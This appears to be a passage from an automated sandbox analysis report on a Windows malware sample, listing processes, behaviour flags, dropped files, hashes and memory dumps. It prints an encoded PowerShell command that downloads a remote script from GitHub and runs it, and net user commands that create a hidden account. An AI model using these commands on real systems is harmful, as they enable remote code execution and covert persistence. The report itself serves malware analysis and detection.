C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blacklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 12341⤵
-
C:\Windows\system32\net.exenet user wgautilacc 12342⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 12343⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES8022.tmpMD5
f1c19fdcd8e34091b934106f106183b1
SHA1db8f845fe8cce2845257263e8b7148e415b1f904
SHA256dbf6f142324e7dbeda2167e6ae05ea01e984b988e67a03f4d981861ca0cfd006
SHA5124284b947d27b0fedb1029a977366febaf5776e3169d4929ef25584b1fc836402bb8f30ff2d37a3ee7839634a201faa38a36c9cd9bf1e7f053e0c6170015381b6
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1MD5
bcac3bbb18f093dbc8e5e76d2675695f
SHA196453f65b41e428937349e6f48fe67d6dfd6a580
SHA256b25768626991b9a33e3ada79e3beb92fa5d83e1b50f2820e6fa2d6cf4827b21a
SHA51278c55502c7d0484b458fadb78bc075b8eda01b794e2037283df11dc58105bd632c0e747e92fd7aac7b79c5ac0ddce9bb2c6e7ce158c743c9f080a52eda0498ab
-
C:\Users\Admin\AppData\Local\Temp\get-points.zipMD5
42c2a160d2d191e6ffcc1076b4734ee2
SHA1c8a71ddb77c6bad039fbb041bbf7ea2021ca9d49
SHA2562b8aebe68161f07e7029bac05eeeb009455553731baf60b447d0d4aaa9fded99
SHA5123b9de3ad6cbe4db3958564b4bd37a45e6aa3a62a4a6e6756d6e997a9cc9c2dca31053e9e0aa300c1660b72332eb1f677f6b65762825ac68a99a55d06043e0939
-
C:\Users\Admin\AppData\Local\Temp\xmkjgs20\xmkjgs20.dllMD5
94e31e7357d6b8274ea78e8eb2265982
SHA124b8622e8502f3932dda8a0fe3425cca9608db31
SHA256a3790a9a02138e9575cf5092fe2d1f91c2ef194d8aa256627ad02e2fbeed0c7e
SHA51299fccd8aead3b37d0a7328cffb1e654e8cf7d5cf8b144a39882848c6c84acfb5558937d3ebe15c5785fbde90121e839231f4182365b4836aba0080fa2638d4b7
-
\??\c:\Users\Admin\AppData\Local\Temp\xmkjgs20\CSC3C8662C2998F402F926B99A1C49107C.TMPMD5
ff15bea84c021981afbeaef3c8f191ca
SHA1cc351c79314b2f6e8fa6f18e2cc1c6b5eca991cf
SHA25626035b74e539e4882d4ad60382794b546d801867425debc0a0848d497a3615ca
SHA512a50c71cf6e594826922a9025805d97d50f107f152f60c5b880a070498ca233e793d4e4b53c11daf289b2a555f23b5e24bb8a27228653f9ae46292a0ac5048927
-
\??\c:\Users\Admin\AppData\Local\Temp\xmkjgs20\xmkjgs20.0.csMD5
6f235215132cdebacd0f793fe970d0e3
SHA12841e44c387ed3b6f293611992f1508fe9b55b89
SHA256ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
SHA512a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
-
\??\c:\Users\Admin\AppData\Local\Temp\xmkjgs20\xmkjgs20.cmdlineMD5
04ed560c0f1794390e4fd54ae7acf985
SHA129387bbea3bcbc12a55274d6331dce68431f592f
SHA2560af1da3715122acebbd553e146f89551fe5ed2a75342eaa76b0354d300839497
SHA512ad4cb56438d379ef84f07093ede7e10c50b7926df9400268befec913cf2c16e9b4d014e7177cb2650ef36bd76f15970505dc017dfacc2aa938d7d302d86cfcbc
-
\Windows\Branding\mediasrv.pngMD5
f357d4e7b83bc0a41c65d97f3e6f50f4
SHA171db3180a8ada6d5d7722c54a5940c3490f78636
SHA256db0b525a0871cd413d9e1e4a31568b10344aa996823a22e85179ea4dab11afba
SHA512566bc45578f2754b4330fc2721d24aef95ae25ef258d56b00c8cb585061f89386a5d27245d301ea0d479797a42f0487605c294008a6d33559634b5e35f4b4e8e
-
\Windows\Branding\mediasvc.pngMD5
d5de6f599d9807bac2f5a8e751a8c38f
SHA19e70edf56b6a5768fda84232e9c557e750d3631b
SHA25618207938b456352ad540ed62fb113b7b11025a6d2b1de08728772c24c8553fca
SHA512e526e3a75be31762bb5fc01f4450ff48391fe36a1e71aef6a89d3f262e523e2f7654501f43667a3e982a05835418e72ae26ec3ba955b8537a700e69e82337fc5
-
memory/184-16-0x0000000000000000-mapping.dmp
-
memory/200-33-0x0000000000000000-mapping.dmp
-
memory/208-50-0x0000000000000000-mapping.dmp
-
memory/208-17-0x0000000000000000-mapping.dmp
-
memory/428-18-0x0000000000000000-mapping.dmp
-
memory/752-37-0x0000000000000000-mapping.dmp
-
memory/940-3-0x00007FFC34CC0000-0x00007FFC356AC000-memory.dmpFilesize
9.9MB
-
memory/940-14-0x0000029CA3B30000-0x0000029CA3B31000-memory.dmpFilesize
4KB
-
memory/940-5-0x0000029CA3BB0000-0x0000029CA3BB1000-memory.dmpFilesize
4KB
-
memory/940-4-0x0000029CA3A00000-0x0000029CA3A01000-memory.dmpFilesize
4KB
-
memory/940-2-0x0000000000000000-mapping.dmp
-
memory/1028-1-0x0000000002930000-0x0000000002931000-memory.dmpFilesize
4KB
-
memory/2064-20-0x0000000000000000-mapping.dmp
-
memory/2180-30-0x0000000000000000-mapping.dmp
-
memory/2224-10-0x0000000000000000-mapping.dmp
-
memory/2360-27-0x0000000000000000-mapping.dmp
-
memory/2380-43-0x0000000000000000-mapping.dmp
-
memory/2380-22-0x0000000000000000-mapping.dmp
-
memory/2420-36-0x0000000000000000-mapping.dmp
-
memory/2460-35-0x0000000000000000-mapping.dmp
-
memory/2524-34-0x0000000000000000-mapping.dmp
-
memory/2524-51-0x0000000000000000-mapping.dmp
-
memory/2524-19-0x0000000000000000-mapping.dmp
-
memory/2544-39-0x0000000000000000-mapping.dmp
-
memory/2544-46-0x00007FFC34CC0000-0x00007FFC356AC000-memory.dmpFilesize
9.9MB
-
memory/2544-45-0x0000000000000000-mapping.dmp
-
memory/2556-15-0x0000000000000000-mapping.dmp
-
memory/2616-52-0x0000000000000000-mapping.dmp
-
memory/2856-40-0x0000000000000000-mapping.dmp
-
memory/3084-38-0x0000000000000000-mapping.dmp
-
memory/3156-26-0x0000000000000000-mapping.dmp
-
memory/3176-25-0x0000000000000000-mapping.dmp
-
memory/3300-21-0x0000000000000000-mapping.dmp
-
memory/3424-32-0x0000000000000000-mapping.dmp
-
memory/3588-42-0x0000000000000000-mapping.dmp
-
memory/3656-7-0x0000000000000000-mapping.dmp
-
memory/3904-31-0x0000000000000000-mapping.dmp
-
memory/3976-24-0x0000000000000000-mapping.dmp
-
memory/3980-41-0x0000000000000000-mapping.dmp
-
memory/3988-44-0x0000000000000000-mapping.dmp
-
memory/4020-23-0x0000000000000000-mapping.dmp
-
memory/4020-53-0x0000000000000000-mapping.dmp